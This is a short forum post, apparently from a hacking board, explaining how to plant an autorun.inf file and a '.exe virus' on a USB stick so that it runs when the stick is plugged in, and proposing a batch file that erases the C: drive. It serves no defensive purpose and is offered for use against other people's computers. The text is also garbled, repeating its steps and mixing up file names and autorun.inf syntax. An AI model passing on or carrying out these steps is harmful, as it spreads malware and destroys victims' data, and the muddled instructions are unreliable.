OP 26 September, 2022 - 09:25 AM
Hi guys, if you want to autorun programs via "USB Stick" the best way is this way.
create a simple Erase C: code and save it as .bat make it autorun.
1) Open notepad and write
2) Put this ‘autorun.inf’ and your actual .exe virus "hex.exe" in the USB Drive.
When you plug in the USB drive, the autorun.inf will launch anything.exe and commands in .exe file virus would execute.
You can also do it for files other than .EXE
create a simple Erase C: code and save it as .bat make it autorun.
1) Open notepad and write
Code:
Run "Notepad"
Type in: [Autorun] Open=MyApp.exe. Action=Start MyApp. Label=My Portable PC. Icon=MyApp.exe.
Save the file as autorun.inf in the root of the USB flash drive
2) Put this ‘autorun.inf’ and your actual .exe virus "hex.exe" in the USB Drive.
When you plug in the USB drive, the autorun.inf will launch anything.exe and commands in .exe file virus would execute.
You can also do it for files other than .EXE
Enjoy. Like is appreciated